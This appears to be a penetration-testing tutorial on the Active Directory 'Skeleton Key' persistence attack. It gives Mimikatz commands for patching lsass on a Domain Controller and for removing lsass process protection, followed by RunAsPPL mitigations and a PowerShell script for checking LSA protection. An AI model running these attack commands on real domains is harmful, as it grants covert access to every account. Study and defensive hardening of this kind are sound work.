Skeleton Keys

This is a persistence technique that allows you to log on to a Domain Controller as any user with a single password.

'Skeleton Keys' are pieces of malware injected into lsass on the Domain Controller that allow logon as any domain user with the same 'master' password. Detection is difficult because users can still log on with their own passwords in addition to the skeleton key password, so nothing breaks for them.

This makes it seem like a very effective persistence technique. However, the patch lives only in memory: a reboot of the DC removes the injected malware and your key will no longer work, so you would have to inject a new skeleton key again.

Domain Admin privileges are required to perform this.

Creating a Key and Injecting it With Mimikatz

The default skeleton key password is "mimikatz".

Step 1 - Inject the Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <dc.domain>

Step 2 - From Another PowerShell Terminal, Issue Commands on the DC

$cred = Get-Credential domain\Administrator # then enter the password "mimikatz" in the prompt
Invoke-Command -ComputerName <dc.domain> -Credential $cred -ScriptBlock {whoami}
  • If RDP or WinRM is enabled, you can also logon remotely with the skeleton key password.

In Case lsass is Running as a Protected Process

  • If lsass is running as a protected process, it is better to try another persistence method, because removing the protection requires loading a kernel driver and will create a lot of noise.

Step 1

  • Upload the Mimikatz driver (mimidriv.sys) to the disk of the target DC

Step 2

# mimikatz.exe
mimikatz # privilege::debug
mimikatz # !+ 
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

Step 3

  • Issue commands on the DC as any user you wish with the skeleton key password.

Mitigations

  • Running LSASS as a Protected Process Light (PPL) forces the attacker to load a kernel driver from disk in order to remove the protection first, which increases the chances of detection. It can be enabled with the following command (it takes effect after a reboot):

New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -Verbose

# After reboot -> verify that LSASS started as a protected process (Wininit Event ID 12 in the System log)
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | Where-Object {$_.Message -like "*protected process*"}

However, before enabling this, test that all the LSA plugins and drivers in use still load with LSASS running as a protected process.
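The mitigation steps above, as an added example that is not part of the original notes: it uses Microsoft's LSA protection audit mode to find plugins that would break, then enforces RunAsPPL and verifies it. It assumes an elevated PowerShell session on the DC being hardened; the function names are my own.

```powershell
# Added example, not from the original page. Registry paths and event IDs are
# Microsoft's documented LSA protection settings; the function names are hypothetical.

$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$AuditKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe'

function Enable-LsaProtectionAudit {
    # Audit mode: LSASS keeps running unprotected but logs every plugin or driver
    # that would be blocked under PPL (CodeIntegrity/Operational events 3065 and 3066).
    if (-not (Test-Path $AuditKey)) { New-Item -Path $AuditKey -Force | Out-Null }
    Set-ItemProperty -Path $AuditKey -Name AuditLevel -Value 8 -Type DWord
}

function Get-LsaProtectionAuditFindings {
    # Run after a reboot in audit mode; an empty result means nothing would fail to load.
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id      = 3065, 3066
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

function Enable-LsaPPL {
    # Enforce: RunAsPPL must be a REG_DWORD with value 1; it takes effect on the next boot.
    Set-ItemProperty -Path $LsaKey -Name RunAsPPL -Value 1 -Type DWord
}

function Test-LsaPPL {
    # Two independent checks: the registry says PPL is configured, and a Wininit
    # Event ID 12 in the System log proves LSASS actually started protected.
    $configured = (Get-ItemProperty -Path $LsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL -eq 1
    $started = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 12 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*LSASS.exe was started as a protected process*' } |
        Select-Object -First 1
    $when = if ($started) { $started.TimeCreated }
    [pscustomobject]@{
        RunAsPPLConfigured = $configured
        LsassStartedAsPPL  = [bool]$started
        LastProtectedStart = $when
    }
}

# Typical sequence: Enable-LsaProtectionAudit; reboot; Get-LsaProtectionAuditFindings;
# fix anything listed; Enable-LsaPPL; reboot; Test-LsaPPL
```

If Test-LsaPPL reports RunAsPPLConfigured as true but LsassStartedAsPPL as false, the machine has not been rebooted since the value was set, or the value was written with the wrong registry type.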

If it works in your environment, PPL also blocks many other attacks that inject code into or patch LSASS, such as Pass-the-Hash, credential dumping, or installing custom SSPs with Mimikatz.
